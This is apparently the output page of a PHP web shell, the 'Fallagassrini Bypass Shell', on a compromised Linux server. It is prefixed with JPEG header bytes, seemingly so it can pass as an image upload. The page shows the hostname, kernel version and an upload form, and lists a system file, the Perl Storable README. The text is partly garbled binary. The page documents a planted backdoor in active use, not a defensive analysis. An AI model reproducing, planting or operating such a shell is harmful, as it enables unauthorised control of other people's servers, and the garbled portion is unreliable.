JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /usr/share/doc/perl-Storable-2.45/

Linux server.meentosys.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Upload File :
Current File : //usr/share/doc/perl-Storable-2.45/README

                         Storable 2.14
               Copyright (c) 1995-2000, Raphael Manfredi
               Copyright (c) 2001-2004, Larry Wall

------------------------------------------------------------------------
    This program is free software; you can redistribute it and/or modify
    it under the same terms as Perl 5 itself.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    Perl 5 License schemes for more details.
------------------------------------------------------------------------

+=======================================================================
| Storable is distributed as a module, but is also part of the official
| Perl core distribution, as of perl 5.8. 
| Maintenance is now done by the perl5-porters.  We thank Raphael
| Manfredi for providing us with this very useful module.
+=======================================================================

The Storable extension brings persistence to your data.

You may recursively store to disk any data structure, no matter how
complex and circular it is, provided it contains only SCALAR, ARRAY,
HASH (possibly tied) and references (possibly blessed) to those items.

At a later stage, or in another program, you may retrieve data from
the stored file and recreate the same hiearchy in memory. If you
had blessed references, the retrieved references are blessed into
the same package, so you must make sure you have access to the
same perl class than the one used to create the relevant objects.

There is also a dclone() routine which performs an optimized mirroring
of any data structure, preserving its topology.

Objects (blessed references) may also redefine the way storage and
retrieval is performed, and/or what deep cloning should do on those
objects.

To compile this extension, run:

    perl Makefile.PL [PERL_SRC=...where you put perl sources...]
    make
    make install

There is an embedded POD manual page in Storable.pm.

Storable was written by Raphael Manfredi <Raphael_Manfredi@pobox.com>
Maintenance is now done by the perl5-porters <perl5-porters@perl.org>

Please e-mail us with problems, bug fixes, comments and complaints,
although if you have complements you should send them to Raphael.
Please don't e-mail Raphael with problems, as he no longer works on
Storable, and your message will be delayed while he forwards it to us.

------------------------------------------------------------------------
Thanks to (in chronological order):

    Jarkko Hietaniemi <jhi@iki.fi>
    Ulrich Pfeifer <pfeifer@charly.informatik.uni-dortmund.de>
    Benjamin A. Holzman <bholzman@earthlink.net>
    Andrew Ford <A.Ford@ford-mason.co.uk>
    Gisle Aas <gisle@aas.no>
    Jeff Gresham <gresham_jeffrey@jpmorgan.com>
    Murray Nesbitt <murray@activestate.com>
    Albert N. Micheev <Albert.N.Micheev@f80.n5049.z2.fidonet.org>
    Marc Lehmann <pcg@opengroup.org>
    Justin Banks <justinb@wamnet.com>
    Jarkko Hietaniemi <jhi@iki.fi> (AGAIN, as perl 5.7.0 Pumpkin!)

for their contributions.

A Japanese translation of this man page is available at the Japanized
Perl Resources Project <https://sourceforge.jp/projects/perldocjp/>.
------------------------------------------------------------------------

The perl5-porters would like to thank

    Raphael Manfredi <Raphael_Manfredi@pobox.com>

According to the perl5.8 Changes file, the following people have helped
bring you this Storable release:

    Abhijit Menon-Sen <ams@wiw.org>
    Andreas J. Koenig <andreas.koenig@anima.de>
    Archer Sully <archer@meer.net>
    Craig A. Berry <craig.berry@psinetcs.com>
    Dan Kogai <dankogai@dan.co.jp>
    Doug MacEachern <dougm@covalent.net>
    Gurusamy Sarathy <gsar@ActiveState.com>
    H.Merijn Brand <h.m.brand@xs4all.nl>
    Jarkko Hietaniemi <jhi@iki.fi>
    Mark Bixby
    Michael Stevens <michael@etla.org>
    Mike Guy <mjtg@cam.ac.uk>
    Nicholas Clark <nick@unfortu.net>
    Peter J. Farley III <pjfarley@banet.net>
    Peter Prymmer <pvhp@forte.com>
    Philip Newton <pne@cpan.org>
    Raphael Manfredi <Raphael_Manfredi@pobox.com>
    Robin Barker <rmb1@cise.npl.co.uk>
    Radu Greab <radu@netsoft.ro>
    Tim Bunce <Tim.Bunce@pobox.com>
    VMSperlers
    Yitzchak Scott-Thoennes <sthoenna@efn.org>

If I've missed you out, please accept my apologies, and e-mail your
patch to perl5-porters@perl.org.

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net